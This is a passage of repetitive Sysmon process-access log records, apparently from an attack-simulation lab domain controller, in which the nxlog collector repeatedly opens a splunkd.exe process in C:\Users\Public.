{"EventTime":"2020-08-01 06:53:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4437,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:18.494\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:18.494","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4438,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:19.494\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:19.494","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4439,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:20.494\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:20.494","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4440,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:21.495\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:21.495","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4441,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:22.495\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:22.495","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4442,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:23.495\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:23.495","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4443,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:24.495\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 